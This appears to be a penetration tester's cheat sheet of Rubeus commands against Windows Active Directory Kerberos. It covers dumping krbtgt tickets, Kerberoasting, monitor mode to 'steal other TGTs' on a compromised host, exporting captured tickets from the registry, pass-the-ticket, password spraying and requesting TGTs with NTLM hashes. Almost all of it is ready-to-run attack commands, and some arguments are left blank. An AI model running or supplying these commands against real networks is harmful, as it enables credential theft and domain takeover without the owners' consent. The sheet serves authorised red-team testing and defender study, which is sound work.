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Dump tickets

rubeus.exe dump /service:krbtgt /nowrap

Kerberoasting attack

rubeus.exe kerberoast /simple /outfile:kerberoast.txt

Monitor mode

This is handy when you're WinRM'd into a box with local/domain admin creds and you want to steal other TGTs:

rubeus monitor /interval:5 /nowrap /runfor:60 /registry:SOFTWARE\MONITOR

Extracting TGTs from registry hives after monitor mode attack

Once you've done the monitor "attack" and captured TGTs to the registry, use reg.exe to extract them.

Grab the TGTs from registry

reg export HKLM\SOFTWARE\MONITOR backup1.reg 

Once you have the TGTs, use something like rubeus2ccache to convert to kirbi or ccache (reference). Then you can use rubeus to pass the TGT.


rubeus.exe ptt /ticket:xxx

Password spraying

rubeus.exe spray /password:MySprayedPass2024! / /dc: /outfile:successful-sprays.txt

Request a TGT

rubeus.exe asktgt / /user:blah /rc4:NTLMHASH /nowrap